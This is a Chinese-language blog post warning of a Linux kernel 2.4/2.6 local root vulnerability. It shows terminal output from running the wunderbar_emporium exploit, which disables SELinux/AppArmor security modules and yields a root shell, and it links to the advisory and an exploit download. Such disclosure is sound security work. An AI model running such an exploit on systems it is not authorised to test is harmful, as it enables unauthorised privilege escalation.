Linux内核高危漏洞

该漏洞影响自2001年以来所有2.4.x和2.6.x的核心版本及其分支。
包括但不限于RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。
只需要执行一个命令，就可以通过此漏洞获得root权限，即使开启了SELinux也于事无补！

我已经在CentOS 5.3（2.6.18-128.el5），DC5SP2（2.6.9-42.7AX），Ubuntu 9.04 Server（2.6.27-7-server），Ubuntu 9.10 Development (2.6.3.10-5-generic/2.6.31-5-pae)，Asianux 3.0(2.6.18-8.10AX）测试，均可以轻松获得root账号权限。以上系统均为32位。下面是一个攻击的简单过程：

  $./wunderbar_emporium.sh
 [+] MAPPED ZERO PAGE!
 [+] Resolved selinux_enforcing to 0xc05d83fc
 [+] Resolved selinux_enabled to 0xc05d83f8
 [+] Resolved apparmor_enabled to 0xc048cba4
 [+] Resolved apparmor_complain to 0xc05d9ff0
 [+] Resolved apparmor_audit to 0xc05d9ff8
 [+] Resolved apparmor_logsyscall to 0xc05d9ffc
 [+] Resolved security_ops to 0xc05d6ba4
 [+] Resolved default_security_ops to 0xc048b940
 [+] Resolved sel_read_enforce to 0xc0228230
 [+] Resolved audit_enabled to 0xc059a5c4
 [+] got ring0!
 [+] detected 2.6 style 8k stacks
sh: mplayer: command not found
 [+] Disabled security of : LSM
 [+] Got root!
sh-3.2# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),30(dip),46(plugdev),106(fuse),108(lpadmin),123(admin),124(sambashare),1003
sh-3.2# uname -a
Linux cp1.3yidc.cn 2.6.27-7-server #1 SMP Tue Nov 4 20:18:35 UTC 2008 i686 GNU/Linux

更详细的情况请参考下面的链接： http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html

演示代码可以通过下面的链接获得（注意数据安全） http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium-3.tgz

Linux|系统管理|WEB开发

关注Linux,系统管理,WEB开发以及开源世界

Comments